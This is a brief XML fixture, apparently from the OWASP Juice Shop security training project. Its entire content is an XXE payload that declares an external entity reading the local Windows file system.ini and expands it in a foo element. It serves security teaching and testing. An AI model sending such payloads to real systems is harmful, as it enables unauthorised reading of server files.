<?xml version="1.0" encoding="UTF-8"?>

<!--
  ~ Copyright (c) 2014-2026 Bjoern Kimminich & the OWASP Juice Shop contributors.
  ~ SPDX-License-Identifier: MIT
  -->

<!DOCTYPE foo [<!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "file:///C:/Windows/system.ini" >]>

<foo>&xxe;</foo>
